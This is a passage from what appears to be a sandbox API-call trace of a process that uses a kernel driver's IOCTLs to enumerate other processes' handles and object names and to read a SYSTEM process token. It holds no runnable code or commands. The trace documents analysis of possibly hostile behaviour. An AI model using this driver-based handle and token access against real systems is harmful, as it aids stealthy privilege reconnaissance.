lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.264] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.264] PsAcquireProcessExitSynchronization () returned 0x0 [0244.264] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.264] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003695dd0, HandleInformation=0x0) returned 0x0 [0244.264] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.264] PsReleaseProcessExitSynchronization () returned 0x2 [0244.264] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.264] ObQueryNameString (in: Object=0xfffffa8003695dd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.264] ObfDereferenceObject (Object=0xfffffa8003695dd0) returned 0x1 [0244.264] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.265] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.265] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.265] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.265] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.265] PsAcquireProcessExitSynchronization () returned 0x0 [0244.265] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.265] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003539a50, HandleInformation=0x0) returned 0x0 [0244.265] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.265] PsReleaseProcessExitSynchronization () returned 0x2 [0244.265] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.265] ObQueryNameString (in: Object=0xfffffa8003539a50, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.265] ObfDereferenceObject (Object=0xfffffa8003539a50) returned 0x1 [0244.265] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.265] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.265] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.265] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.265] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.265] PsAcquireProcessExitSynchronization () returned 0x0 [0244.265] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.265] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e8070, HandleInformation=0x0) returned 0x0 [0244.265] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.265] PsReleaseProcessExitSynchronization () returned 0x2 [0244.265] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.266] ObQueryNameString (in: Object=0xfffffa80034e8070, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.266] ObfDereferenceObject (Object=0xfffffa80034e8070) returned 0x2 [0244.266] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.266] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.266] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.266] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.266] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.266] PsAcquireProcessExitSynchronization () returned 0x0 [0244.266] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.266] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034f6070, HandleInformation=0x0) returned 0x0 [0244.266] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.266] PsReleaseProcessExitSynchronization () returned 0x2 [0244.266] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.266] ObQueryNameString (in: Object=0xfffffa80034f6070, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.266] ObfDereferenceObject (Object=0xfffffa80034f6070) returned 0x2 [0244.266] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.266] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.266] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.266] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0244.266] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.266] PsAcquireProcessExitSynchronization () returned 0x0 [0244.266] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.266] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e3070, HandleInformation=0x0) returned 0x0 [0244.267] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.267] PsReleaseProcessExitSynchronization () returned 0x2 [0244.267] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.267] ObQueryNameString (in: Object=0xfffffa80034e3070, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.267] ObfDereferenceObject (Object=0xfffffa80034e3070) returned 0x2 [0244.267] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.267] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.267] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.267] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.267] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.267] PsAcquireProcessExitSynchronization () returned 0x0 [0244.267] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.267] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e1070, HandleInformation=0x0) returned 0x0 [0244.267] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.267] PsReleaseProcessExitSynchronization () returned 0x2 [0244.267] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.267] ObQueryNameString (in: Object=0xfffffa80034e1070, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.267] ObfDereferenceObject (Object=0xfffffa80034e1070) returned 0x2 [0244.267] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.267] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.267] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.267] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.267] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.268] PsAcquireProcessExitSynchronization () returned 0x0 [0244.268] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880053c85d0) [0244.268] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034df070, HandleInformation=0x0) returned 0x0 [0244.268] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.268] PsReleaseProcessExitSynchronization () returned 0x2 [0244.268] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0244.268] ObQueryNameString (in: Object=0xfffffa80034df070, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.268] ObfDereferenceObject (Object=0xfffffa80034df070) returned 0x2 [0244.268] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.268] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0xc8 [0244.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.268] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003653680, HandleInformation=0x0) returned 0x0 [0244.268] ObOpenObjectByPointer (in: Object=0xfffffa8003653680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0244.268] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe2 [0244.268] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002096a80 | out: TokenHandle=0xfffffa8002096a80*=0xc4) returned 0x0 [0244.268] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0244.268] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.268] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.268] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.270] CloseHandle (hObject=0xc4) returned 1 [0244.270] CloseHandle (hObject=0xc8) returned 1 [0244.271] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.271] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.271] PsAcquireProcessExitSynchronization () returned 0x0 [0244.271] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.271] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003573070, HandleInformation=0x0) returned 0x0 [0244.271] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.271] PsReleaseProcessExitSynchronization () returned 0x2 [0244.271] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.271] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.271] ObfDereferenceObject (Object=0xfffffa8003573070) returned 0x1 [0244.271] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.271] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.271] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.271] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0244.271] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.271] PsAcquireProcessExitSynchronization () returned 0x0 [0244.271] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.271] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000a07620, HandleInformation=0x0) returned 0x0 [0244.271] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.271] PsReleaseProcessExitSynchronization () returned 0x2 [0244.271] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.271] ObQueryNameString (in: Object=0xfffff8a000a07620, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.271] ObfDereferenceObject (Object=0xfffff8a000a07620) returned 0x2 [0244.272] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.272] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.272] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0244.272] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.272] PsAcquireProcessExitSynchronization () returned 0x0 [0244.272] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.272] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a004473aa0, HandleInformation=0x0) returned 0x0 [0244.272] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.272] PsReleaseProcessExitSynchronization () returned 0x2 [0244.272] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.272] ObQueryNameString (in: Object=0xfffff8a004473aa0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.272] ObfDereferenceObject (Object=0xfffff8a004473aa0) returned 0x2 [0244.272] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.272] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.272] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.272] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.272] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.272] PsAcquireProcessExitSynchronization () returned 0x0 [0244.272] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.272] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800bd6c500, HandleInformation=0x0) returned 0x0 [0244.272] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.272] PsReleaseProcessExitSynchronization () returned 0x2 [0244.272] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.272] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.273] ObfDereferenceObject (Object=0xfffffa800bd6c500) returned 0x1 [0244.273] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.273] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.273] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.273] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.273] PsAcquireProcessExitSynchronization () returned 0x0 [0244.273] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.273] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036b9f20, HandleInformation=0x0) returned 0x0 [0244.273] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.273] PsReleaseProcessExitSynchronization () returned 0x2 [0244.273] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.273] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.273] ObfDereferenceObject (Object=0xfffffa80036b9f20) returned 0x1 [0244.273] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.273] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.273] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.273] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.273] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.273] PsAcquireProcessExitSynchronization () returned 0x0 [0244.273] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.273] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000a2b240, HandleInformation=0x0) returned 0x0 [0244.273] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.274] PsReleaseProcessExitSynchronization () returned 0x2 [0244.274] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.274] ObQueryNameString (in: Object=0xfffff8a000a2b240, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.274] ObfDereferenceObject (Object=0xfffff8a000a2b240) returned 0x2 [0244.274] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.274] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.274] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0244.274] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.274] PsAcquireProcessExitSynchronization () returned 0x0 [0244.274] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880053c85d0) [0244.274] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036a8f20, HandleInformation=0x0) returned 0x0 [0244.274] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.274] PsReleaseProcessExitSynchronization () returned 0x2 [0244.274] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe0 [0244.274] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.274] ObfDereferenceObject (Object=0xfffffa80036a8f20) returned 0x1 [0244.274] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.274] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.274] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.274] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, 